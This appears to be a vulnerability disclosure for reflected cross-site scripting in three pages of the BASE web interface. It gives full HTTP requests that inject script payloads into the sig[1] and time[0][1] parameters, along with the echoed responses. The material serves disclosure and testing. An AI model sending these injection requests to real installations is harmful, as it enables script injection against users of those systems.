=== XSS Reflective ===
There are 3 pages that have Reflective XSS.
/base/base_qry_main.php
/base/base_stat_alerts.php
/base/base_stat_uaddr.php
=== Example 1 ====
/base/base_qry_main.php the value of sig[1] is not being validated.
=== Request ===
GET /base/base_qry_main.php?search=1&sensor=+&ag=+&sig%5B0%5D=+&sig%5B2%5D=%3D&sig%5B1%5D=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sig_class=+&sig_priority%5B0%5D=+&sig_priority%5B1%5D=&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=+&time%5B0%5D%5B2%5D=+&time%5B0%5D%5B3%5D=&time%5B0%5D%5B4%5D=+&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+&submit=ADD+TIME&ip_addr%5B0%5D%5B0%5D=+&ip_addr%5B0%5D%5B1%5D=+&ip_addr%5B0%5D%5B2%5D=%3D&ip_addr%5B0%5D%5B3%5D=&ip_addr%5B0%5D%5B8%5D=+&ip_addr%5B0%5D%5B9%5D=+&ip_field%5B0%5D%5B0%5D=+&ip_field%5B0%5D%5B1%5D=+&ip_field%5B0%5D%5B2%5D=%3D&ip_field%5B0%5D%5B3%5D=&ip_field%5B0%5D%5B4%5D=+&ip_field%5B0%5D%5B5%5D=+&data_encode%5B0%5D=+&data_encode%5B1%5D=+&data%5B0%5D%5B0%5D=+&data%5B0%5D%5B1%5D=+&data%5B0%5D%5B2%5D=&data%5B0%5D%5B3%5D=+&data%5B0%5D%5B4%5D=+&new=1&sort_order=none&caller=&num_result_rows=-1¤t_view=-1 HTTP/1.1
Host: 172.16.105.130
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://172.16.105.130/base/base_qry_main.php?new=1
Cookie: PHPSESSID=dad4b449a7b0c4e0b397c29d960ae9c2
=== Response ===
...snip...
<INPUT TYPE="text" NAME="sig[1]" SIZE=40 VALUE=""><script>alert("XSS")</script>"><BR><B>Classification: </B><SELECT NAME="sig_class">
...snip...
====================================================================================================================================================
=== Example 2 ===
/base/base_stat_alerts.php the value of time[0][1] is not being validated.
=== Request ===
GET /base/base_stat_alerts.php?time_cnt=1&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=%3E%3D5c9f2<script>alert(1)</script>f0d91eba175&time%5B0%5D%5B2%5D=05&time%5B0%5D%5B3%5D=22&time%5B0%5D%5B4%5D=2009&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+ HTTP/1.1
Host: 172.16.105.131
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=06daf1ffd99701a4451d37348ded8347;
=== Response ===
...snip...
<TD><CODE> time >=5c9f2<script>alert(1)</script>f0d91eba175 [ 05 / 22 / 2009 ] [ </CODE>
..snip...
====================================================================================================================================================
=== Example 3 ===
/base/base_stat_uaddr.php the value of time[0][1] is not being validated.
=== Request ===
GET /base/base_stat_uaddr.php?addr_type=2&sort_order=occur_d&time_cnt=1&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=%3E%3Dd5c9d<script>alert(1)</script>4e48bef68b4&time%5B0%5D%5B2%5D=05&time%5B0%5D%5B3%5D=22&time%5B0%5D%5B4%5D=2009&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+ HTTP/1.1
Host: 172.16.105.131
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=06daf1ffd99701a4451d37348ded8347;
=== Response ===
...snip...
<TD><CODE> time >=d5c9d<script>alert(1)</script>4e48bef68b4 [ 05 / 22 / 2009 ] [ </CODE>
...snip...
